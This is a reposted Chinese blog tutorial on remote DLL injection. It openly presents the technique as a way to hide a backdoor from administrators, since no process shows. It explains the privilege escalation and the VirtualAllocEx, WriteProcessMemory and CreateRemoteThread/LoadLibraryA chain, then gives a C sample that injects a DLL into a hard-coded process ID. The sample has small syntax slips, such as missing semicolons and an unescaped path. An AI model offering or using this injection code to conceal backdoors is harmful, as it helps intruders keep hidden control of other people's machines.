[转]远程注入DLL 详细介绍

[转]远程注入DLL 详细介绍

    远程注入DLL
没错，现在讨论的就是传说中的远程注入技术，目前一种非常流行的隐藏技术，因为它没有进程，而前面讨论的两种方法都会有进程出现，因此，有经验的管理员很容易发现，然后先杀进程，在找出后门文件删除。要实现远程注入，我们要编写两个程序，一个是后门文件，这里不是把它写成.exe文件，而是写成.dll文件，在这里先说一下.dll文件，.dll文件，其实就是动态连接库，它里面装封了提供.exe文件调用的函数，一般情况下，双击它，是不能运行它的，它只能由.exe来调用，于是就有了远程注入了，原理很简单：我们把后门的主要功能写成一个函数，然后装封到.dl文件中，然后再另外写一个执行文件来启动它，这样就不会有后门的进程了。那远程注入又指什么呢？这个问题问得好，一般情况下，每个进程都有自己的私有空间，理论上，别的进程是不允许对这个私人空间进行操作的，但是，我们可以利用一些方法进入这个空间并进行操作，将自己的代码写入正在运行的进程中，于是就有了远程注入了。
对dll后门的编写就不作过多的讨论了，现在来看实现注入功能的可执行文件的编写：
用到的函数有：
OpenProcessToken()；
LookupPrivilegeValue()；
AdjustTokenPrivileges()；
OpenProcess()；
VirtualAllocEx()；
WriteProcessMemory()；
GetProcAddress()；
CreateRemoteThread()；

先简单的介绍以下这些函数的作用，因为我们要操作的是系统中的其他进程，如果没有足够的系统权限，我们是无法写入甚至连读取其它进程的内存地址的，所以我们就需要提升自己的权限，用到以下3个函数
OpenProcessToken()；  //打开进程令牌
LookupPrivilegeValue()；//返回一个本地系统独一无二的ID，用于系统权限更改
AdjustTokenPrivileges()；//从英文意思也能看出它是更改进程权限用的吧？

进入宿主进程的内存空间
在拥有了进入宿主进程空间的权限之后，我们就需要在其内存加入让它加载我们后门的代码了，用LoadLibraryA()函数就可以加载我们的DLL了，它只需要DLL文件的路径就可以了，在这里我们要把DLL文件的路径写入到宿主的内存空间里，因为DLL的文件路径并不存在于宿主进程内存空间了，用到的函数有：
OpenProcess()；//用于修改宿主进程的一些属性，详细参看MSDN
VirtualAllocEx()；//用于在宿主内存空间中申请内存空间以写入DLL的文件名
WriteProcessMemory();//往申请到的空间中写入DLL的文件名

在宿主中启动新的线程
用的是LoadLibraryA()函数来加载，但在使用LoadLibraryA()之前必须知道它的入口地址，所以用GetProcAdress来获得它的入口地址，有了它的地址以后，就可以用CreateRemoteThread()函数来启动新的线程了，到次，整个注入过程完成，不过还不非常完善，这就留给聪明的你来完成了；）。
简单的例子：

#include  " stdafx.h "  

int  EnableDebugPriv( const   char   *  name) 
{ 
    HANDLE hToken; 
    TOKEN_PRIVILEGES tp; 
    LUID luid; 
    //打开进程令牌环 
    OpenProcessToken(GetCurrentProcess(), 
                    TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, 
                    &hToken); 
    //获得进程本地唯一ID 
    LookupPrivilegeValue(NULL,name,&luid) 
     
    tp.PrivilegeCount = 1; 
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
    tp.Privileges[0].Luid = luid; 
    //调整权限 
    AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL); 
    return 0; 
}  

BOOL InjectDll( const   char   * DllFullPath,  const  DWORD dwRemoteProcessId) 
{ 
    HANDLE hRemoteProcess; 
    EnableDebugPriv(SE_DEBUG_NAME) 
    //打开远程线程 
    hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | //允许远程创建线程PROCESS_VM_OPERATION | //允许远程VM操作 
                            PROCESS_VM_WRITE,//允许远程VM写 
                            FALSE, dwRemoteProcessId ); 
    char *pszLibFileRemote; 
    //使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名空间 
    pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, lstrlen(DllFullPath)+1, 
                            MEM_COMMIT, PAGE_READWRITE); 
    //使用WriteProcessMemory函数将DLL的路径名写入到远程进程的内存空间 
    WriteProcessMemory(hRemoteProcess, 
                pszLibFileRemote, (void *) DllFullPath, lstrlen(DllFullPath)+1, NULL)； 
    //计算LoadLibraryA的入口地址 
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE) 
            GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA"); 

    //启动远程线程LoadLibraryA，通过远程线程调用创建新的线程 
    HANDLE hRemoteThread; 
    if( (hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL) ) == NULL) 
    { 
        printf("CreateRemoteThread error!\n"); 
        return FALSE; 
    } 

    return TRUE; 
}  

int  APIENTRY WinMain(HINSTANCE hInstance, 
                     HINSTANCE hPrevInstance, 
                     LPSTR     lpCmdLine, 
                      int        nCmdShow) 
{ 
    InjectDll("c:\zrqfzr.dll",3060) //这个数字是你想注入的进程的ID号 
    return 0; 
}